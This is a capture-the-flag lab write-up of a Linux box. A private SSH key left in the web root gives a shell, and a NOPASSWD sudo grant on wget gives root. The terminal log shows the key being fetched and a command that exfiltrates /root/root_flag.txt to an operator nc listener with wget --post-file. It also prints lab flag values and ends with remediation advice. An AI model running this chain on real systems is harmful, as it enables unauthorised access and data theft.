SSH key from sitemap .ssh and sudo wget root exfil
Foundations Linux engagement: HTML comment leaked user jessie; /sitemap/.ssh/id_rsa enabled key auth; sudo NOPASSWD wget posted /root/root_flag.txt to the operator listener.
- Case files
- SSH key from sitemap .ssh and sudo wget root exfil
Nmap showed 22/80; source comment named jessie; gobuster found /sitemap/.ssh/id_rsa; SSH as jessie; sudo wget exfiltrated root_flag.txt.
Recovered jessie from HTML comment; downloaded id_rsa from /sitemap/.ssh/; authenticated.
Confirmed NOPASSWD wget; posted /root/root_flag.txt to operator nc listener.
Engagement summary
Nmap showed 22/80; source comment named jessie; gobuster found /sitemap/.ssh/id_rsa; SSH as jessie; sudo wget exfiltrated root_flag.txt.
WGEL presented SSH and HTTP. The default-style site source contained an HTML comment naming jessie. Directory brute force uncovered /sitemap/, and further enum revealed /.ssh/id_rsa served over HTTP — a private key in the web root. chmod 600 and ssh -i id_rsa jessie@TARGET yielded a shell; user_flag.txt lived under Jessie’s Documents. sudo -l showed (root) NOPASSWD: /usr/bin/wget. Per GTFOBins, wget can POST a local file to an attacker listener. nc -nlvp on the operator host plus sudo wget --post-file=/root/root_flag.txt http://OPERATOR:PORT returned the root artifact in the HTTP body. Chain: username hint + world-readable SSH key + passwordless wget as root.
Business impact
Private keys in web-accessible paths are immediate account takeover. NOPASSWD wget as root is a built-in exfiltration and file-write primitive. Treat document roots as hostile; never grant unconstrained network utilities via sudo.
Web enum to Jessie SSH
Recovered jessie from HTML comment; downloaded id_rsa from /sitemap/.ssh/; authenticated.
OPERATOR · ENUM / SSH
savvy@lab:~$ nmap -sV 10.10.10.10
22/tcp open ssh 80/tcp open http
savvy@lab:~$ curl -s http://10.10.10.10/ | grep -i jessie
<!-- jessie -->
savvy@lab:~$ gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
/sitemap → /.ssh/id_rsa
savvy@lab:~$ curl -s http://10.10.10.10/sitemap/.ssh/id_rsa -o id_rsa && chmod 600 id_rsa
savvy@lab:~$ ssh -i id_rsa jessie@10.10.10.10
jessie@10.10.10.10: ******** savvy@lab:~$ cat ~/Documents/user_flag.txt
057c67131c3d5e42dd5cd3075b198ff6
sudo wget POST of root_flag.txt
Confirmed NOPASSWD wget; posted /root/root_flag.txt to operator nc listener.
OPERATOR · PRIVESC
savvy@lab:~$ sudo -l
(root) NOPASSWD: /usr/bin/wget
savvy@lab:~$ nc -nlvp 9000
savvy@lab:~$ sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.0.54:9000
POST body → b1b968b37519ad1daa6408188649263d
Remediation
Block serving of .ssh and backup paths from the web root. Use deploy keys with least privilege, never user private keys on the document root. Remove NOPASSWD for wget/curl/python; if file transfer as root is required, wrap a narrow script that cannot choose arbitrary URLs or local paths.